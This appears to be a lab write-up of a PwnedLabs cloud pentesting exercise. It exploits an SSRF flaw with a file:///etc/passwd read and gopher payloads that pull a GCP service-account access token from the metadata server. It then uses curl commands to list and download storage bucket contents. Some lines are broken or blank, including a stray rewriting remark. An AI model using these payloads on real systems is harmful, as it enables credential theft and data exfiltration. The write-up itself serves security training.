PwnedLabs - Exploit SSRF with Gopher for GCP Initial Access (Cloud Pentesting)
Source: Dev.to
Lab description
Target IP Address: 35.226.245.121
Enumeration
From the initial port scan, ports 22 (SSH) and 80 (HTTP) are open, while ports 1433, 3389, and 5432 are closed.
After viewing the landing page and moving onto the shop page, inspecting the elements reveals the site uses a Google Cloud Storage bucket. On the profile.php page we can test for a Server‑Side Request Forgery (SSRF) vulnerability.
Exploitation
Using the file:///etc/passwd payload we are able to view the local /etc/passwd file, proving that the application is vulnerable to SSRF.
To pivot into the cloud environment we first query the VM metadata for the associated service account using a Gopher payload:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
The query reveals the service account name is:
bucketviewer@gr-proj-1.iam.gserviceaccount.comNext, we retrieve the service account’s access token with another Gopher payload:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/bucketviewer@gr-proj-1.iam.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
Export the token as an environment variable:
export ACCESS_TOKEN=Data exfiltration
With the credentials we can query the bucket via the Google Storage API:
curl "https://www.googleapis.com/storage/v1/b/gigantic-retail/o" \
-H "Authorization: Bearer $ACCESS_TOKEN"
The response reveals a path to a flag. Finally, download the flag file:
curl -o flag.txt "https://storage.googleapis.com/gigantic-retail/"
Here’s the cleaned‑up markdown for the image link, preserving the original intent:
